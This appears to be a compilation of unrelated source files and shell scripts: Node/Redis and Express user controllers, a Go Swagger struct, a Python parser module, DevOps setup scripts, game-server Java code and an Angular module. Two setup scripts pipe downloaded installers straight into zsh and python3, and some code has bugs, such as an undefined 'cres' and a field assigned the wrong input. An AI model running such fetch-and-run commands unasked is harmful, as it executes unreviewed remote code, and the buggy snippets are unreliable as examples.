var client = redis.createClient({
host: config.redis.server,
port: config.redis.port,
password: config.redis.password,
});
exports.setObject = function (key, object) {
// 进入前需要先序列化
client.set(key, JSON.stringify(object));
};
exports.getObject = function (key) {
return new Promise((resolve, reject) => {
client.get(key, function (err, obj) {
if (err) {
reject(err);
}
// 取出前需要反序列化
resolve(JSON.parse(obj));
});
});
}; |
var mongoDB = require('../../config/mongoose.conf');
var baseDeDatos = mongoDB();
var usuarioModel = require('../models/usuario.server.model');
var request = require('request');
exports.getUsuarios = function (req, res) {
console.log("---------------------------------------");
console.log("******Devolver todos los usuarios******");
usuarioModel.find({}, function (err, users) {
if(err)
res.status(500).send({status:'Error al recuperar los usuarios',code:500});
if(users.length>0) {
var userMap = [];
users.forEach(function (user) {
userMap.push( user);
});
res.status(200).send({data: userMap, code:200,status:'Recuperados los usuarios'});
}else{
res.status(404).send({status:'No se han encontrado usuarios en la familia',code:404});
}
});
};
exports.getUsuario = function (req, res) {
console.log("----------------------------");
console.log("******Devolver usuario******");
console.log("Devolviendo usuario con uid:" + req.params.id);
usuarioModel.findOne({_id: req.params.id}, function (err, user) {
if(err)
res.status(500).send({status:'Error al recuperar el usuario',code:500});
if (user) {
res.status(200).send({Usuario: user,status:'Recuperado el usuario correctamente',code:200});
} else {
res.status(404).send({status: "No se ha encontrado el usuario con el uid:" + req.params.id,code:404});
}
});
};
exports.addUser = function (req, res) {
console.log("----------------------------");
console.log("******Actualizar usuario******");
console.log("Añadimos usuario...");
console.log(req.body);
console.log("Creamos el modelo");
var usuario = new usuarioModel({
nombre: req.body.nombre,
apellidos: req.body.apellidos,
email: req.body.email,
direccion : req.body.email
}
);
usuarioModel.findOne({ email: req.body.email }, function (err, user) {
if (user) {
res.status(403).send({error: "El email ya está en uso.", code: 403});
} else {
console.log("Guardamos en la db...");
usuario.save(function(err){
if(err)
console.log(err);
else{
console.log("Guardado en la db.");
res.status(201).send({data:usuario,status:"Añadido el usaurio con éxito",code:201});
}
});
}
});
};
exports.delUser = function (req, res) {
console.log("----------------------------");
console.log("******Eliminar usuario******");
console.log("Vamos a eliminar el usuario con el id: " + req.params.id);
usuarioModel.findOne({ _id: req.params.id }, function (err, user) {
if(err)
res.status(500).send({status:'Error al buscar el usuario para eliminarlo',code:500});
if(user) {
user.remove();
res.status(200).send({status: "Usuario eliminado con éxito",code:200});
}else{
res.status(404).send({status: "No se encontró el usuario",code:404});
}
});
};
exports.updateUser = function (req, res) {
console.log("-------------------------------");
console.log("******Actualizar usuario******");
console.log("El uid a actualizar es:"+ req.params.id);
usuarioModel.findOneAndUpdate({_id: req.params.id}, {
nombre: req.body.nombre,
apellidos: req.body.apellidos,
email: req.body.email,
direccion: req.body.direccion,
}, function (err, user) {
if (err)
cres.status(500).send({status: "Error al buscar y editar el usuario", code: 500});
if (user) {
console.log("USUARIO ACTUALIZADO CON ÉXITO");
console.log(user);
res.status(204).send({status: "Editado con éxito", code: 204});
}
else
res.status(404).send({status: "No se ha encontrado el usuario a modificiar con id: "+ req.params.id, code: 404});
});
}
|
/*
* Access API
*
* No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
*
* API version: 1.0.0
* Generated by: Swagger Codegen (https://github.com/swagger-api/swagger-codegen.git)
*/
package swagger
import (
"time"
)
type BlockEvents struct {
BlockId string `json:"block_id,omitempty"`
BlockHeight string `json:"block_height,omitempty"`
BlockTimestamp time.Time `json:"block_timestamp,omitempty"`
Events []Event `json:"events,omitempty"`
Links *Links `json:"_links,omitempty"`
}
|
import sys
from keyword import iskeyword
from dataclasses import dataclass
from arpeggio import ParsingExpression, EOF, RegExMatch as _ , StrMatch
from arpeggio import ParseTreeNode, Terminal
#------------------------------------------------------------------------------
ALL = ( # single character constants and rules are added dynamically
#
# rules
' whitespace ' # single whitespace character
' newline ' # newline, optionally preceed by whitespace
' blank_line ' # two newlines, intervening whitespace ok
' ws t_ws p_ws' # one or more whitespace characters
' wx t_ws p_ws' # zero or more whitespace characters
' valid_wx t_wx_newline p_wx_newline '
' valid_ws t_ws_newline p_ws_newline '
).split()
#------------------------------------------------------------------------------
@dataclass
class character (object):
name : str # Must be n all uppercase valid identifier
raw : str # i.e. r'\n' is two characters, not one
alias : str = None
ch : str = None
name_lc : str = None
rule : object = None
rule_m : object = None
#------------------------------------------------------------------------------
# https://donsnotes.com/tech/charsets/ascii.html
_c = character
CHARACTER_TABLE = [
_c( 'TAB', r'\t' ),
_c( 'LF', r'\n' , 'LINEFEED' ), # 10 0x0a
_c( 'CR', r'\r' , 'CARRIAGE_RETURN' ), # 13 0x0d
_c( 'SPACE', r' ' ), # 32 0x20
_c( 'L_PAREN', r'(' ), # 40 0x28
_c( 'R_PAREN', r')' ), # 41 0x29
_c( 'COMMA', r',' ), # 44 0x2c
_c( 'EQ', r'=' , 'EQUALS' ), # 61 0x32
_c( 'L_BRACKET', r'[' ), # 91 0x5b
_c( 'R_BRACKET', r']' ), # 94 0x5d
_c( 'BAR', r'|' ), # 124 0x7c
]
del _c
#------------------------------------------------------------------------------
@dataclass
class ParseSpec (object):
text : str
rule : ParsingExpression
expect : ParseTreeNode
#------------------------------------------------------------------------------
def create_character_rules_and_terminals ( c ):
c.name_lc = c.name.lower()
code = f"""
def {c.name_lc} ():
return {c.name}
CHARACTER_RULES.append({c.name_lc})
ALL.append({c.name_lc})
def {c.name_lc}_m ():
return StrMatch({c.name}, rule_name='{c.name_lc}')
CHARACTER_MRULES.append({c.name_lc}_m)
ALL.append({c.name_lc}_m)
t_{c.name_lc} = Terminal({c.name_lc}_m(), 0, {c.name})
CHARACTER_TERMINALS.append(t_{c.name_lc})
ALL.append(t_{c.name_lc})
p_{c.name_lc} = ParseSpec( {c.name}, {c.name_lc}_m, t_{c.name_lc} )
ALL.append(p_{c.name_lc})
"""
exec(code.replace('\t',''), globals())
if c.alias is not None and len(c.alias) > 0:
c.alias_lc = c.alias.lower()
code = f"""
{c.alias_lc} = {c.name_lc}
ALL.append({c.alias_lc})
{c.alias_lc}_m = {c.name_lc}_m
ALL.append({c.alias_lc}_m)
t_{c.alias_lc} = t_{c.name_lc}
ALL.append(t_{c.alias_lc})
p_{c.alias_lc} = p_{c.name_lc}
ALL.append(p_{c.alias_lc})
"""
exec(code.replace('\t',''), globals())
#------------------------------------------------------------------------------
def validate_name(which, name, raw):
p = "PACKAGE CONFIGURATION ERROR, "
assert not iskeyword(name), \
( f"{p}Invalid character {which} '{name}' for '{raw}', {which} "
f"may not be a Python keyword." )
assert name.isidentifier(), \
( f"{p}Invalid character {which} '{name}' for '{raw}', {which} "
f"is not a valid Python identifier." )
assert name == name.upper(), \
( f"{p}Character {which} '{name}' is not all uppercase. Character "
f"name and alias constants must be all uppercase. Lowercase "
f"reserved for their corresponding grammar rules.")
assert name not in CHARACTER_NAME_TO_CHAR, \
( f"{p}Character {which} '{name}' for '{raw}', already exists. Prior "
f"occurance for '{CHARACTER_NAME_TO_CHAR[name]}'")
#------------------------------------------------------------------------------
module = sys.modules[__name__]
CHARACTER_CHAR_TO_NAME = { }
CHARACTER_CHAR_TO_ALIAS = { }
CHARACTER_NAME_TO_CHAR = { }
CHARACTER_CHAR_TO_RAW = { }
CHARACTER_RAW_TO_CHAR = { }
# Arrays in order of occurance in CHARACTER_TABLE, no extra elements for aliases.
CHARACTER_CHARS = [ ]
CHARACTER_RAW = [ ]
CHARACTER_RULES = [ ]
CHARACTER_MRULES = [ ]
CHARACTER_TERMINALS = [ ]
for c in CHARACTER_TABLE :
validate_name('name', c.name, c.raw)
c.ch = eval(f"'{c.raw}'")
CHARACTER_CHARS.append(c.ch)
CHARACTER_RAW.append(c.raw)
CHARACTER_CHAR_TO_NAME[c.ch] = c.name
CHARACTER_NAME_TO_CHAR[c.name] = c.ch
CHARACTER_RAW_TO_CHAR[c.raw] = c.ch
CHARACTER_CHAR_TO_RAW[c.ch] = c.raw
setattr ( module, c.name, c.ch )
ALL.append(c.name)
if c.alias is not None :
validate_name('alias', c.alias, c.raw)
CHARACTER_NAME_TO_CHAR[c.alias] = c.ch
CHARACTER_CHAR_TO_ALIAS[c.ch] = c.alias
setattr ( module, c.alias, c.ch )
ALL.append(c.alias)
create_character_rules_and_terminals ( c )
del module
#------------------------------------------------------------------------------
# WHITESPACE_CHARS = ( TAB , CR , SPACE )
WHITESPACE_CHARS = TAB + CR + SPACE
WHITESPACE_RAW = tuple( [ CHARACTER_CHAR_TO_RAW[ch] for ch in WHITESPACE_CHARS ] )
WHITESPACE_RAW_STR = ''.join(WHITESPACE_RAW)
WHITESPACE_RULES = ( tab , cr , space )
WHITESPACE_NAMES = { ch : CHARACTER_CHAR_TO_NAME[ch] for ch in WHITESPACE_CHARS }
# WHITESPACE_REGEX = r'[\t\r ]'
WHITESPACE_REGEX = f"[{WHITESPACE_RAW_STR}]"
def whitespace():
"""One whitespace character of tab(9), carriage return (10), space (32)"""
return _(WHITESPACE_REGEX, rule_name='whitespace', skipws=False )
WS_REGEX = WHITESPACE_REGEX + '+'
def ws():
"""One or more whitespace characters"""
return _(WS_REGEX, rule_name='ws', skipws=False )
WX_REGEX = WHITESPACE_REGEX + '*'
def wx():
"""Zero or more whitespace characters (often '_' in PEG)"""
return _(WX_REGEX, rule_name='wx', skipws=False )
NEWLINE_REGEX = WX_REGEX + r'\n'
def newline():
"""Newline with optional preceeding whitespace"""
return _(NEWLINE_REGEX, rule_name='newline', skipws=False)
BLANK_LINE_REGEX = r'(?<=\n)' + NEWLINE_REGEX
def blank_line():
"""Two newlines with optional whitespace in between"""
return _(BLANK_LINE_REGEX, rule_name='blank_line', skipws=False)
#------------------------------------------------------------------------------
t_newline = Terminal(newline(), 0, '\n')
p_newline = ParseSpec ( LINEFEED, newline, t_newline )
t_eof = Terminal(EOF(), 0, '')
p_eof = ParseSpec ( '', EOF, t_eof )
#------------------------------------------------------------------------------
def linefeed_eol_only ( text ) :
n_linefeeds = text.count(LINEFEED)
# print(f"\n: n_linefeeds = {n_linefeeds}")
if n_linefeeds <= 0 :
raise ValueError(f"No linefeeds in <text>, one is required "
"at the end. Please address.")
if n_linefeeds > 1 :
raise ValueError(f"Found {n_linefeeds} linefeeds in <text>, only one "
"allowed, at the end. Please address.")
if text[-1] != LINEFEED :
if n_linefeeds > 0 :
raise ValueError(f"Linefeed not at end of specified <text>. "
"Please address." )
#------------------------------------------------------------------------------
def ensure_linefeed_eol ( text ) :
if text is None or text == '' :
text = LINEFEED
if text[-1] != LINEFEED :
text += LINEFEED
linefeed_eol_only(text)
return text
#------------------------------------------------------------------------------
def valid_wx ( text ) :
for ch in text :
if ch not in WHITESPACE_CHARS :
raise ValueError(
f"In specified <text> '{text}', ch '{ch}' is not a configured "
"whitespace character ({WHITESPACE_NAMES}). Please address." )
#------------------------------------------------------------------------------
def valid_ws ( text ) :
missing = ( "<text> has no whitespace characters. 'ws' requires "
"at least one. Please address or use t_wx_newline." )
if text is None or text == '' or text == LINEFEED :
raise ValueError(missing)
for ch in WHITESPACE_CHARS :
if ch in text :
return valid_wx(text)
raise ValueError(missing)
#------------------------------------------------------------------------------
def t_wx_newline ( text = None ):
"""Return an arpeggio.Terminal for newline with the specified whitespace.
If leading whitespace portion of <text> is not empty, create a newline
Terminal with the leading whitespace followed by a linefeed.
Simply returns t_newline if no whitespace specified.
If ending linefeed is missing, it will be appended.
<text> : zero or more whitespace characters, optionally followed by a
linefeed. May not contain more than linefeed. If present,
the linefeed must be last.
"""
text = ensure_linefeed_eol(text)
valid_wx ( text[:-1] )
return Terminal( newline(), 0, text )
def p_wx_newline ( text ) :
t = t_wx_newline(text)
return ParseSpec ( t.value, newline, t )
#------------------------------------------------------------------------------
def t_ws_newline ( text ):
"""Return an arpeggio.Terminal for newline with the specified whitespace
followed by a linefeed. If linefeed is missing, it will be appended.
<text> : One or more whitespace characters, optionally followed by a
linefeed. May not contain more than linefeed. If present,
the linefeed must be last.
"""
text = ensure_linefeed_eol(text)
valid_ws ( text[:-1] )
return Terminal( newline(), 0, text )
def p_ws_newline ( text ) :
t = t_ws_newline(text)
return ParseSpec ( t.value, newline, t )
#------------------------------------------------------------------------------
def t_wx ( text ) :
"""Return an arpeggio.Terminal for wx with the specified whitespace.
If leading whitespace portion of <text> is not empty, create a newline
Terminal with the leading whitespace followed by a linefeed.
Simply returns t_newline if no whitespace specified.
<text> : zero or more whitespace characters, optionally followed by a
linefeed. May not contain more than linefeed. If present,
the linefeed must be last.
"""
valid_wx(text)
return Terminal( wx(), 0, text )
def p_wx ( text ) :
return ParseSpec ( text, ws, t_ws(text) )
#------------------------------------------------------------------------------
def t_ws ( text ) :
"""Return an arpeggio.Terminal ws for the specified whitespace.
If leading whitespace portion of <text> is not empty, create a newline
Terminal with the leading whitespace followed by a linefeed.
Simply returns t_newline if no whitespace specified.
<text> : zero or more whitespace characters, optionally followed by a
linefeed. May not contain more than linefeed. If present,
the linefeed must be last.
"""
valid_ws(text)
return Terminal( ws(), 0, text )
def p_ws ( text ) :
return ParseSpec ( text, ws, t_ws(text) )
#------------------------------------------------------------------------------
|
#!/usr/bin/env bash
# vim:ts=4:sts=4:sw=4:et
#
# Author: Hari Sekhon
# Date: 2021-04-16 16:14:04 +0100 (Fri, 16 Apr 2021)
#
# https://github.com/HariSekhon/DevOps-Bash-tools
#
# License: see accompanying Hari Sekhon LICENSE file
#
# If you're using my code you're welcome to connect with me on LinkedIn and optionally send me feedback to help steer this or other code I publish
#
# https://www.linkedin.com/in/HariSekhon
#
set -euo pipefail
[ -n "${DEBUG:-}" ] && set -x
srcdir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
# shellcheck disable=SC1090
. "$srcdir/lib/utils.sh"
# shellcheck disable=SC2034,SC2154
usage_description="
List important Kubernetes pods with their nodes to check on if they are obeying the scheduling requirements you want
"
# used by usage() in lib/utils.sh
# shellcheck disable=SC2034
usage_args=""
help_usage "$@"
important_pods_regex="
kube-dns
ingress-nginx
nginx-ingress
cert-manager
jenkins
teamcity
-[[:digit:]]+$
"
important_pods_regex="$(sed '/^[[:space:]]*$/d' <<< "$important_pods_regex" | tr '\n' '|')"
important_pods_regex="${important_pods_regex%|}"
kubectl get pods --all-namespaces -o wide |
grep -Ei "$important_pods_regex"
|
<reponame>lerages/anarchy-source
package org.rs2server.rs2.model.skills.smithing;
import org.rs2server.cache.format.CacheItemDefinition;
import org.rs2server.rs2.Constants;
import org.rs2server.rs2.model.Item;
import java.util.*;
public class SmithingUtils {
public static final Item HAMMER = new Item(2347);
public enum ForgingBar {
BRONZE(2349, 0, new int[]{1205, 1277, 1321, 1291, 1307, 1351, 1422, 1337, 1375, -1, 1103, 1075, 1087, 1117, 4819, 1139, 1155, 1173, 1189, -1, -1, 819, 39, 864, 1794, -1, 9375, 9420, 19570, -1, -1, -1}, new double[]{12.5, 25, 37.5, 42.5}, new int[]{66, 82, 210, 267}),
IRON(2351, 15, new int[]{1203, 1279, 1323, 1293, 1309, 1349, 1420, 1335, 1363, -1, 1101, 1067, 1081, 1115, 4820, 1137, 1153, 1175, 1191, 4540, -1, 820, 40, 863, 7225, -1, 9377, 9423, 19572}, new double[]{25, 30, 55, 57.5}, new int[]{66, 90, 162, 210, 267}),
STEEL(2353, 30, new int[]{1207, 1281, 1325, 1295, 1311, 1353, 1424, 1339, 1365, -1, 1105, 1069, 1083, 1119, 1539, 1141, 1157, 1177, 1193, 4544, -1, 821, 41, 865, 2370, -1, 9378, 9425, 19574}, new double[]{37.5, 45, 52.5, 67.5}, new int[]{66, 98, 162, 210, 267}),
MITHRIL(2359, 50, new int[]{1209, 1285, 1329, 1299, 1315, 1355, 1428, 1343, 1369, -1, 1109, 1071, 1085, 1121, 4822, 1143, 1159, 1181, 1197, -1, -1, 822, 42, 866, 9379, 9427, 9416, 9427, 9379, 19576}, new double[]{50, 60, 70, 90}, new int[]{66, 170, 210, 267}),
ADAMANT(2361, 70, new int[]{1211, 1287, 1331, 1301, 1317, 1357, 1430, 1345, 1371, -1, 1111, 1073, 1091, 1123, 4823, 1145, 1161, 1183, 1199, -1, -1, 823, 43, 867, -1, -1, 9380, 9429, 19578}, new double[]{62.5, 70.5, 78.5, 85.5}, new int[]{66, 210, 267}),
RUNE(2363, 85, new int[]{1213, 1289, 1333, 1303, 1319, 1359, 1432, 1347, 1373, -1, 1113, 1079, 1093, 1127, 4824, 1147, 1163, 1185, 1201, -1, -1, 824, 44, 868, -1, -1, 9381, 9431, 19580}, new double[]{75, 80, 90, 105.5}, new int[]{66, 210, 267});
private int barId;
private int[] activatedChildren;
private int[] items;
private double[] experience;
private int baseLevel;
private ForgingBar(int barId, int baseLevel, int[] items, double[] experience, int[] activatedChildren) {
this.barId = barId;
this.baseLevel = baseLevel;
this.items = items;
this.experience = experience;
this.activatedChildren = activatedChildren;
}
public int[] getItems() {
return items;
}
public int getBaseLevel() {
return baseLevel;
}
public int getBarId() {
return barId;
}
public double[] getExperience() {
return experience;
}
private static Map<Integer, ForgingBar> smithingBars = new HashMap<Integer, ForgingBar>();
static {
for (ForgingBar bar : ForgingBar.values()) {
smithingBars.put(bar.barId, bar);
}
}
public static ForgingBar forId(int id) {
return smithingBars.get(id);
}
}
public enum SmeltingBar {
// The primary ore MUST be the first element in the required items array.
BRONZE(1, 6.2, new Item[]{new Item(436), new Item(438)}, new Item(2349)),
BLURITE(8, 8.0, new Item[]{new Item(668)}, new Item(9467)),
IRON(15, 12.5, new Item[]{new Item(440)}, new Item(2351)),
SILVER(20, 13.7, new Item[]{new Item(442)}, new Item(2355)),
STEEL(30, 17.5, new Item[]{new Item(440), new Item(453, 2)}, new Item(2353)),
GOLD(40, 22.5, new Item[]{new Item(444)}, new Item(2357)),
MITHRIL(50, 30, new Item[]{new Item(447), new Item(453, 4)}, new Item(2359)),
ADAMANT(70, 37.5, new Item[]{new Item(449), new Item(453, 6)}, new Item(2361)),
RUNE(85, 50, new Item[]{new Item(451), new Item(453, 8)}, new Item(2363));
private int levelRequired;
private double experience;
private Item[] itemsRequired;
private Item producedBar;
private SmeltingBar(int levelRequired, double experience, Item[] itemsRequired, Item producedBar) {
this.levelRequired = levelRequired;
this.experience = experience;
this.itemsRequired = itemsRequired;
this.producedBar = producedBar;
}
public static SmeltingBar of(int ore) {
for (SmeltingBar bar : SmeltingBar.values()) {
for (Item item : bar.getItemsRequired()) {
if (item.getId() == ore) {
return bar;
}
}
}
return null;
}
public Item[] getItemsRequired() {
return itemsRequired;
}
public int getLevelRequired() {
return levelRequired;
}
public Item getProducedBar() {
return producedBar;
}
public double getExperience() {
return experience;
}
public int getAmount(int childId) {
switch (childId) {
case 16:
case 20:
case 24:
case 28:
case 32:
case 36:
case 40:
case 44:
case 48:
return 1;
case 15:
case 19:
case 23:
case 27:
case 31:
case 35:
case 39:
case 43:
case 47:
return 5;
case 14:
case 18:
case 22:
case 26:
case 30:
case 34:
case 38:
case 42:
case 46:
return 10;
case 13:
case 17:
case 21:
case 25:
case 29:
case 33:
case 37:
case 41:
case 45:
return -1;
}
return 0;
}
}
public static final int[] CHILD_IDS = new int[29];
public static final int[] CLICK_OPTIONS =
{
1, 5, 10, 32767
};
private static Map<String, Integer> levelThreshold = new HashMap<String, Integer>();
static {
int counter = 2;
for (int i = 0; i < CHILD_IDS.length; i++) {
CHILD_IDS[i] = counter;
counter += 1;
}
levelThreshold.put("dagger", 0);
levelThreshold.put("sword", 4);
levelThreshold.put("scimitar", 5);
levelThreshold.put("longsword", 6);
levelThreshold.put("2h sword", 14);
levelThreshold.put("axe", 2);
levelThreshold.put("mace", 2);
levelThreshold.put("warhammer", 9);
levelThreshold.put("battleaxe", 10);
levelThreshold.put("chainbody", 11);
levelThreshold.put("platelegs", 16);
levelThreshold.put("plateskirt", 16);
levelThreshold.put("platebody", 18);
levelThreshold.put("nails", 4);
levelThreshold.put("med helm", 3);
levelThreshold.put("full helm", 7);
levelThreshold.put("sq shield", 8);
levelThreshold.put("kiteshield", 12);
levelThreshold.put("Oil lantern frame", 11);
levelThreshold.put("Bullseye lantern (unf)", 19);
levelThreshold.put("dart tips", 4);
levelThreshold.put("arrowtips", 5);
levelThreshold.put("knife", 7);
levelThreshold.put("javelin heads", 4);
levelThreshold.put("Iron spit", 2);
levelThreshold.put("wire", 4);
levelThreshold.put("bolts", 3);
levelThreshold.put("limbs", 6);
levelThreshold.put("grapple tip", 9);
levelThreshold.put("studs", 6);
}
public static int[] barToIntArray(List<SmeltingBar> bar) {
int[] newArray = new int[bar.size()];
for (int i = 0; i < bar.size(); i++) {
newArray[i] = bar.get(i).ordinal();
}
return newArray;
}
public static int getLevelIncrement(ForgingBar bar, int id) {
if (id == -1) {
return 1;
}
String name = CacheItemDefinition.get(id).getName();
for (Map.Entry<String, Integer> entry : levelThreshold.entrySet()) {
if (name.contains(entry.getKey())) {
int increment = entry.getValue();
if (name.contains("dagger") && bar != ForgingBar.BRONZE) {
increment--;
} else if (name.contains("hatchet") && bar == ForgingBar.BRONZE || bar == ForgingBar.RUNE) {
increment--;
}
if (bar == ForgingBar.RUNE && increment > 14) {
increment -= 4;
}
return increment;
}
}
System.out.println(name + " hasn't been added to the level increment map!");
return 1;
}
public static int getItemAmount(int id) {
String name = CacheItemDefinition.get(id).getName();
if (name.contains("knife") || name.contains("javelin heads")) {
return 5;
} else if (name.contains("bolts") || name.contains("dart tip")) {
return 10;
} else if (name.contains("arrowtips") || name.contains("nails")) {
return 15;
}
return 1;
}
public static int getBarAmount(int levelRequired, ForgingBar bar, int id) {
if (levelRequired >= 99) {
levelRequired = 99;
}
int level = levelRequired - bar.baseLevel;
String name = CacheItemDefinition.get(id).getName().toLowerCase();
// System.out.println("Level: " + level + ", Name: " + name);
if (level >= 0 && level <= 4) {
if (name.contains("battleaxe") || name.contains("2h sword")) {
return 3;
} else if (name.contains("longsword")) {
return 2;
}
return 1;
} else if (level > 4 && level <= 8) {
if (name.contains("knife") || name.contains("arrowtips") || name.contains("dart tips") || name.contains("limb") || name.contains("studs")) {
return 1;
}
return 2;
} else if (level >= 9 && level <= 16) {
if (name.contains("grapple")) {
return 1;
} else if (name.contains("claws")) {
return 2;
} else if (name.contains("platebody")) {
return 5;
}
return 3;
} else if (level >= 17) {
if (name.contains("bullseye")) {
return 1;
}
return 5;
}
return 1;
}
}
|
#!/usr/bin/env zsh
# install nvm
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.34.0/install.sh | zsh
. ~/.zshrc
nvm install 10.16.0
nvm alias default 10
npm install -g babel-cli
|
sudo apt update
sudo apt --assume-yes install ffmpeg python3-venv
python3 -m venv venvgen
source venvgen/bin/activate
python -m pip install wheel
python -m pip install -r requirements-latest.txt
python -m pip install requests
git clone https://github.com/chentinghao/download_google_drive.git
FILEID="1Z1dc_gQSmafDeWgqRxTJwsDhT7C7g8XF"
FILEPATH="config/vox-adv-cpk.pth.tar"
python download_google_drive/download_gdrive.py $FILEID $FILEPATH
CUDA_REPO_PKG=cuda-repo-ubuntu1604_10.0.130-1_amd64.deb
wget -O /tmp/${CUDA_REPO_PKG} https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1604/x86_64/${CUDA_REPO_PKG}
sudo dpkg -i /tmp/${CUDA_REPO_PKG}
sudo apt-key adv --fetch-keys https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1604/x86_64/7fa2af80.pub
rm -f /tmp/${CUDA_REPO_PKG}
sudo apt-get update
sudo apt-get --assume-yes install cuda-drivers
sudo apt-get --assume-yes install cuda |
module EMRPC
# ReconnectingPid collects all messages in the backlog buffer and tries to reconnect.
# Calls self.on_raise() with the following exceptions:
# *
#
class ReconnectingPid
include Pid
DEFAULT_MAX_BACKLOG = 256
DEFAULT_MAX_ATTEMPTS = 5
DEFAULT_TIMEOUT = 5 # sec.
DEFAULT_TIMER = Timers::EVENTED
# Arguments:
# address Address if a pid or the pid itself to connect to.
#
# Options:
# :max_backlog Maximum backlog size. BacklogError is raised when backlog becomes larger than
# the specified size. Default is 256 messages.
#
# :max_attempts Maximum number of connection attempts. AttemptsError is raised when this number is exceeded.
# Counter is set to zero after each successful connection. Default is 5 attempts.
#
# :timeout Time interval in seconds. TimeoutError is raised when connection was not established
# in the specified amount of time. Default is 5 seconds.
#
# :timer Proc which runs a periodic timer. Default is Timers::EVENTED. See EMRPC::Timers for more info.
#
def initialize(address, options = {})
super(address, options)
@address = address
# Options
@max_backlog = options[:max_backlog] || DEFAULT_MAX_BACKLOG
@max_attempts = options[:max_attempts] || DEFAULT_MAX_ATTEMPTS
@timeout = options[:timeout] || DEFAULT_TIMEOUT
@timer = options[:timer] || DEFAULT_TIMER
# Gentlemen, start your engines!
@attempts = 1
@backlog = Array.new
@timeout_thread = @timer.call([ @timeout, 1 ].max, method(:timer_action))
connect(address)
end
def send(*args)
if rpid = @rpid
rpid.send(*args)
else
@backlog.push(args)
if @backlog.size > @max_backlog
on_raise(self, BacklogError.new("Backlog exceeded maximum size of #{@max_backlog} messages"))
end
end
end
def flush!
while args = @backlog.shift
send(*args)
end
end
def connected(rpid)
@rpid = rpid
@attempts = 1
flush!
end
def disconnected(rpid)
@rpid = nil
connect(@address) unless killed?
end
def connection_failed(conn)
a = (@attempts += 1)
if a > @max_attempts
on_raise(self, AttemptsError.new("Maximum number of #{@max_attempts} connecting attempts exceeded"))
end
connect(@address)
end
def timer_action
if @rpid
@state = nil
return
end
if @state == :timeout
@state = nil
on_raise(self, TimeoutError.new("Failed to reconnect with #{@timeout} sec. timeout"))
else
@state = :timeout
end
end
class ReconnectingError < StandardError; end
class BacklogError < ReconnectingError; end
class AttemptsError < ReconnectingError; end
class TimeoutError < ReconnectingError; end
end # ReconnectingPid
end # EMRPC
|
#!/bin/bash
set -eo pipefail
SCRIPT_DIR=$(cd "$(dirname "$0")"; pwd)
PROJECT_DIR=$1
shift
"$@" ./src/play/play \
RE_YPDO \
"${SCRIPT_DIR}/tiles.txt" \
"${PROJECT_DIR}/boards/wwf_challenge.txt"
|
#!/bin/bash
set -euo pipefail
yum update -y && yum upgrade -y
yum install -y \
amazon-ecr-credential-helper \
amazon-cloudwatch-agent \
docker-19.03.13ce-1.amzn2 \
gcc \
gcc-c++ \
git \
jq \
patch \
htop \
tmux \
bcc-tools \
python3
curl -sSL https://bootstrap.pypa.io/get-pip.py | python3
pip3 install --no-cache-dir PyYAML docker-compose
# Configure the docker daemon DNS instead of relying on the default.
mkdir -p /etc/docker
cat << EOF > /etc/docker/docker.json
{
"dns": ["169.254.169.253"],
}
EOF
# Start and configure docker
service docker start
systemctl enable docker
# add ssm-user and ec2-user to docker group for convenience
usermod -aG docker ssm-user
usermod -aG docker ec2-user |
import numpy as np
from sklearn import svm
# Load the data
X = np.load('images.npy')
Y = np.load('labels.npy')
# Create the model
model = svm.SVC(kernel='linear')
# Train the model
model.fit(X, Y) |
#!/bin/bash
function build_pass {
pass_dir="$1"
echo "Building pass: $pass_dir"
pushd "$pass_dir"
make -j $(nproc)
popd
}
# Idempotent regions pass (checkpoint placement)
build_pass "idempotent-expander"
# Write buffering pass (Write Clusterer)
build_pass "write-buffering"
# Loop scheduler (Loop Write Clusterer)
build_pass "loop-scheduler"
# Idempotent expander (Expander)
build_pass "idempotent-regions"
|
def classify_points(point, polygon):
is_inside = False
for i in range(len(polygon)):
p1 = polygon[i]
j = (i + 1) % len(polygon)
p2 = polygon[j]
if min(p1[1], p2[1]) <= point[1] <= max(p1[1], p2[1]) and (point[1] - p1[1]) * (p2[0] - p1[0]) < (point[0] - p1[0]) * (p2[1] - p1[1]):
is_inside = not is_inside
if is_inside:
return "inside"
else:
return "outside" |
<reponame>ngochai94/laminext<gh_stars>0
package io.laminext.site
object TemplateVars {
val vars = Seq(
"laminextVersion" -> "0.12.0"
)
def apply(s: String): String =
vars.foldLeft(s) { case (acc, (varName, varValue)) =>
acc.replace(s"{{${varName}}}", varValue)
}
}
|
import { BrowserModule } from '@angular/platform-browser';
import { NgModule } from '@angular/core';
import { FormsModule } from '@angular/forms';
import {environment} from '../environments/environment';
import {BrowserAnimationsModule} from '@angular/platform-browser/animations';
import { AppComponent } from './app.component';
import { NgIf } from '@angular/common';
import {NgForOf} from '@angular/common';
import {routing, appRoutingProviders} from './app.routing';
import {HttpModule} from '@angular/http';
import { HttpClientModule } from '@angular/common/http';
import { GooglePlaceModule } from "ngx-google-places-autocomplete";
import {chart} from 'chart.js';
import { JwtHelper } from 'angular2-jwt';
import {DataTableModule} from "angular2-datatable";
import {DataFilterPipe} from './components/filter/data-filter-pipe';
import {ToastModule} from 'ng2-toastr/ng2-toastr';
import { ModalModule } from 'ngx-modialog';
import { BootstrapModalModule } from 'ngx-modialog/plugins/bootstrap';
import { Ng4LoadingSpinnerModule } from 'ng4-loading-spinner';
import {AngularFireModule} from 'angularfire2';
import {AngularFireDatabaseModule} from 'angularfire2/database';
import { AmChartsModule } from "@amcharts/amcharts3-angular";
import { CKEditorModule } from 'ng2-ckeditor';
import { AngularFirestoreModule } from 'angularfire2/firestore';
import {OperationService} from './components/service/operation.service';
import {DashboardService} from './components/service/dashboard.service';
import { AuthenticateService } from './components/service/authenticate.service';
import { ChequeService } from './components/service/cheque.service';
import { ChangeService } from './components/service/change.service';
import {CompteService} from './components/service/compte.service';
import {EmailService} from './components/service/email.service';
import {ProfileService} from './components/service/profile.service';
import {TaskService} from './components/service/task.service';
import {LoginComponent} from './components/login/login.component';
import {NavbarComponent} from './components/navbar/navbar.component';
import {DashboardComponent} from './components/dashboard/dashboard.component';
import {OperationComponent} from './components/operation/operation.component';
import {ChequeComponent} from './components/cheque/cheque.component';
import {ChangeComponent} from './components/change/change.component';
import {EmailComponent} from './components/email/email.component';
import {InboxComponent} from './components/email/inbox/inbox.component';
